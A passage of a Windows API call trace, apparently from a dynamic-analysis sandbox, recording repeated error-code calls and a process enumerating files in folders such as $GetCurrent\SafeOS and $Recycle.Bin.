() returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.053] GetLastError () returned 0x0 [0045.053] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.054] GetLastError () returned 0x0 [0045.054] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.055] SetLastError (dwErrCode=0x0) [0045.055] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.056] SetLastError (dwErrCode=0x0) [0045.056] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.057] GetLastError () returned 0x0 [0045.057] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.058] SetLastError (dwErrCode=0x0) [0045.058] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.059] SetLastError (dwErrCode=0x0) [0045.059] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.060] SetLastError (dwErrCode=0x0) [0045.060] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.061] SetLastError (dwErrCode=0x0) [0045.061] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.062] GetLastError () returned 0x0 [0045.062] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] GetLastError () returned 0x0 [0045.063] SetLastError (dwErrCode=0x0) [0045.063] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0045.063] FindClose (in: hFindFile=0xf58ee8 | out: hFindFile=0xf58ee8) returned 1 [0045.064] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3350298 | out: hHeap=0x2a60000) returned 1 [0045.064] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0045.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf59228 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0045.065] FindNextFileW (in: hFindFile=0xf59228, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0045.066] FindClose (in: hFindFile=0xf59228 | out: hFindFile=0xf59228) returned 1 [0045.066] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3350298 | out: hHeap=0x2a60000) returned 1 [0045.066] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0045.066] FindClose (in: hFindFile=0xf590a8 | out: hFindFile=0xf590a8) returned 1 [0045.066] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3340290 | out: hHeap=0x2a60000) returned 1 [0045.067] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x31af524 | out: lpFindFileData=0x31af524*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff654, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0045.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xf58ee8 [0045.068] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0045.068] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0045.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf590a8 [0045.068] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.068] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.068] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.068] FindClose (in: hFindFile=0xf590a8 | out: hFindFile=0xf590a8) returned 1 [0045.068] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3350298 | out: hHeap=0x2a60000) returned 1 [0045.068] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0045.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf590a8 [0045.068] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.069] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.069] FindNextFileW (in: hFindFile=0xf590a8, lpFindFileData=0x31af01c | out: lpFindFileData=0x31af01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.069] FindClose (in: hFindFile=0xf590a8 | out: hFindFile=0xf590a8) returned 1 [0045.069] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3350298 | out: hHeap=0x2a60000) returned 1 [0045.069] FindNextFileW (in: hFindFile=0xf58ee8, lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0045.069] FindClose (in: hFindFile=0xf58ee8 | out: hFindFile=0xf58ee8) returned 1 [0045.069] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3340290 | out: hHeap=0x2a60000) returned 1 [0045.069] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x31af524 | out: lpFindFileData=0x31af524*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff654, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0045.070] FindNextFileW (in: hFindFile=0xf58ea8, lpFindFileData=0x31af524 | out: lpFindFileData=0x31af524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff654, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0045.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x31af2a0 | out: lpFindFileData=0x31af2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, 